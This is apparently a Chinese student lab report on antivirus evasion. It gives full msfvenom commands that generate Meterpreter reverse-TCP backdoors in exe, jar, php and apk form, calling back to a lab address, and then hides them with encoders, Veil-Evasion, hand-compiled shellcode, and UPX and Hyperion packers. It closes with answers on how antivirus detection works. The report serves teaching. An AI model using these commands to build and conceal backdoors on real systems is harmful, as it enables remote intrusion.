1. 实践内容(4分)
1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分)
正确使用msf编码器
- 用
msfvenom -l encoders命令可以查看能使用的可以生成不同后门的许多编码器。 - 将实验二中用msf命令生成的后门程序放到virscan网站中扫描结果如下:
因此,后门程序如若不加以处理、掩饰,分分钟会被杀毒软件查出来。
msfvenom生成如jar之类的其他文件
- 我用
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘x00’ LHOST=192.168.70.141 LPORT=5321 -f exe > exp3_test.exe指令对后门程序进行10次编码,再上传到virscan上扫描,发现并没有什么变化。原因是msfvenom会以固定的模板生成exe,所有它生成的exe,如果使用默认参数或模板,也有一定的固定特征。而AV厂商会针对其使用的模板来生成特征码,这样就一劳永逸地解决所有msfvenom生成的恶意代码了。
msfvenom生成如jar之类的其他文件
- 用
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.70.141 lport=5321 x> exp3_jar_backdoor.jar指令生成jar文件
- 用
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.70.141 lport=5321 x> exp3_php_backdoor.php指令生成php文件
- 用
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.70.141 lport=5321 R> exp3_apk_backdoor.apk指令生成apk文件
veil-evasion
由于在github上下载veil-evasion速度太慢,我在CSDN上找到了资源,下载好后,拷贝进虚拟机解压安装。cd Veil-Evasion-master进入Veil-Evasion-master目录,bash setup/setup.sh -s启动安装。
安装好后,./Veil-Evasion.py进入Veil。
在Veil中输入use找到c/meterpreter/rev_tcp(第6条),输入6用c语言重写meterperter。设置反弹连接IP:set LHOST 192.168.70.142。设置端口:set LPORT 5321。
输入generate生成文件,然后输入playload的名字:20165321_payload。
上传到virscan网站上查一下,
发现还是有能被查杀到。
半手工注入Shellcode并执行
首先使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.70.141 LPORT=5321 -f c用c语言生成一段shellcode
创建一个文件20165321.c,然后将unsigned char buf[]赋值到其中,代码如下:
使用命令i686-w64-mingw32-g++ 20165321.c -o 5321.exe编译这个.c文件为可执行文件,然后把该文件上传到virscan上查一下,结果还是能查出来。
加壳
加压缩壳
使用upx 5321.exe -o 5321upx.exe加压缩壳
结果还是被查出来了。
加加密壳
将5321upx.exe拷贝到/usr/share/windows-binaries/hyperion/下,并且进入到这个文件目录,使用终端输入命令wine hyperion.exe -v 5321upx.exe 5321upx_hyperion.exe进行加加密壳
结果然并卵
1.2 通过组合应用各种技术实现恶意代码免杀(0.5分)
- 对半手工制作shellcode加压缩壳不能达到免杀的目的,加密壳有一定的几率是可以达到了免杀的目的。
- 加密壳的免杀和反弹连接:
2.基础问题回答
(1)杀软是如何检测出恶意代码的?
答:
1、根据特征码:病毒中的一/多段代码;特征码库就是黑名单。
2、启发式:如果一只鸟叫得像鸭子,走得像鸭子,长得像鸭子,那它就是一只鸭子。
3、根据行为:在启发式基础上对软件行为进行监控
(2)免杀是做什么?
免杀即“反杀毒技术”,让安插的后门不被AV软件发现。通过改变代码的特征,让杀毒软件成为摆设,防止被杀软查杀的一种技术。
(3)免杀的基本方法有哪些?
修改方法:
- 直接修改特征码的十六进制法
- 修改字符串大小写法
- 等价替换法
- 指令顺序调换法
- 通用跳转法
- 一键加壳法
3.实践总结与体会
本次实验,让我体会到杀毒软件的不足之处,与病毒的特征之一的隐蔽性。想必我们的电脑里面应该会存在一些隐藏起来的病毒,而我们并不知道。以后我要加强对自己电脑的防范。
4.开启杀软能绝对防止电脑中恶意代码吗?
不能。